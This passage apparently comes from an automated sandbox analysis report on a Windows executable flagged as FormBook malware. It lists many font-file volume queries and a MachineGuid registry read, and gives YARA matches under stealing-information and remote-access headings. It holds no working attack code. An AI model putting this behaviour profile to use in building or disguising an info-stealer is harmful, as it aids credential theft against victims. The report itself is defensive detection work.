              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Users\user\Desktop\4pFzkB6ePK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.285193753.0000000001410000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.284397721.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.470152812.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.472397377.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.472184819.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.228140943.0000000003659000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.2.4pFzkB6ePK.exe.378cfa0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.4pFzkB6ePK.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.4pFzkB6ePK.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.4pFzkB6ePK.exe.37dcbc0.2.raw.unpack, type: UNPACKEDPE

              Remote Access Functionality:

              barindex
              Yara detected FormBookShow sources
              Source: Yara matchFile source: 00000005.00000002.285256775.0000000001440000.00000040.00000001.sdmp, type: MEMORY
